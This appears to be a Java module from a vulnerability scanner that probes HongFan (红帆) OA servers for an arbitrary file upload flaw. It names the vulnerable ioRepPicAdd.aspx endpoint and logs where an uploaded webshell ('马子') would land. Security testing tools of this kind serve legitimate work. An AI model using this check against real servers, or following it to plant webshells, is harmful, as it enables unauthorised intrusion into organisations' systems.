package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;

import java.net.MalformedURLException;

@BasicMapping(uri = "红帆OA非医院专版")
public class iofficeController extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description = "红帆oa任意文件上传",SupportVulType = SupportVul.UploadFile)
    public void vul_upload(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  红帆oa任意文件上传");
        String url = "/ioffice/prg/set/Report/ioRepPicAdd.aspx";
        String data = "{ioffice}";
        switch (type){
            case EXP:
                WriteLog("无法exp利用");
                break;
            case POC:
                new HttpRequest(target+url).Post(data);

                HttpRequest httpRequest2 = new HttpRequest(target+url);
                Response result2 = httpRequest2.Get("");
                if(result2.responseBody.contains("ioRepPicAdd.aspx") && result2.statusCode==200){
                    WriteLog("\n[*] 存在漏洞,请前往"+target+"/ioffice/prg/set/Report/ioRepPicAdd.aspx进行上传");
                    WriteLog("\n[*] 文件上传路径为:"+target+"/iOffice/upfiles/rep/pic/马子名");
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }
    }
}
